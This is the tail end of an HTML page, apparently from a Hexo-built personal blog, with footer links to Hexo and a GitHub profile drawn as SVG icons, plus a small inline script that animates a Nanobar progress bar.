        <a class="footer-link icon" href="https://hexo.io" target="_blank" style="text-decoration: none;" rel="noreferrer" aria-label="Hexo.io">
        <svg class="hexo svg-hov" width="14" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><title>Hexo.js</title><path d="M12 .007L1.57 6.056V18.05L12 23.995l10.43-6.049V5.952L12 .007zm4.798 17.105l-.939.521-.939-.521V12.94H9.08v4.172l-.94.521-.938-.521V6.89l.939-.521.939.521v4.172h5.84V6.89l.94-.521.938.521v10.222z"/></svg>
        </a>
        
    </div>

    <!-- Sepcial thanks to https://simpleicons.org/ for the icons -->
    <div class="four columns mb-3 posisi" >
      
      <a class="ml-0 footer-link icon" href="https://github.com/Noname0519" target="_blank" style="text-decoration: none" rel="noreferrer" aria-label="GitHub">
        <svg class="github svg-hov" width="18" role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>GitHub</title><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg>
      </a>
      

      

      

      

    </div>
  
</div>

        </div>
      </div>

    </div>

  </div>
  <script src="/js/nanobar.min.js"></script>
  <script>
    var options = {
      classname: 'nanobar',
      id: 'myNanobar'
    };
    var nanobar = new Nanobar(options);
    nanobar.go(30);
    nanobar.go(76);
    nanobar.go(100);
  </script>

</body>

</html>
